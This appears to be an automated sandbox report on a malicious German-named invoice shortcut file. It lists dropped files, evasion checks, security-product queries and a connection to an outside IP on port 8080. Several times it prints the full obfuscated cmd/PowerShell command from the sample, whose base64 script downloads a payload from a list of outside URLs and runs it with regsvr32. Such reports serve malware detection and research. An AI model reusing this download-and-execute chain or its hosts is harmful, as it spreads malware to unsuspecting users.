                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\JydgVvbPD\MevgMvopaw.BUSJump to dropped file
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\UjKMhzOwg\JWwyPPSZDhCDc.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\JydgVvbPD\MevgMvopaw.BUSJump to dropped file
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\UjKMhzOwg\JWwyPPSZDhCDc.dll (copy)Jump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\UjKMhzOwg\JWwyPPSZDhCDc.dll:Zone.Identifier read attributes | delete
                    Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep count: 6543 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep count: 2933 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5620Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 6148Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 2276Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6543
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2933
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                    Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.7 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                    Source: svchost.exe, 00000010.00000002.526941758.000002E1B7E29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@a
                    Source: svchost.exe, 00000010.00000002.528849751.000002E1BD862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                    Source: powershell.exe, 00000002.00000002.302723143.00000166F7EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
                    Source: svchost.exe, 00000007.00000002.526437619.00000209F5A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                    Source: regsvr32.exe, 00000009.00000002.526839029.000000000084B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.528796992.000002E1BD855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.527691265.000002B9834EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.527574160.000002B9834CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.527202097.000002B98348B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: regsvr32.exe, 00000009.00000002.526688728.000000000080C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                    Source: svchost.exe, 00000007.00000002.526570774.00000209F5A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.526897876.0000020E43266000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.526749079.000001D4A3C24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: regsvr32.exe, 00000009.00000002.526839029.000000000084B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21EBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21F0215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21F12E3 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21EBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21E3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v:on /c DZ9UkEaBzDep9CltZVGcsQuzGzfPdwf8nTfLANcu0jNEGxiW7YvnGsgahEnFDklFWCuez6Py||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\JydgVvbPD\MevgMvopaw.BUS

                    Language, Device and Operating System Detection

                    barindex
                    Source: Yara matchFile source: Rechnungskorrektur 2022.20.05_1305.lnk, type: SAMPLE
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21E8900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21E8860 HeapCreate,GetVersion,HeapSetInformation,

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                    Source: svchost.exe, 0000000D.00000002.526834421.0000017433051000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
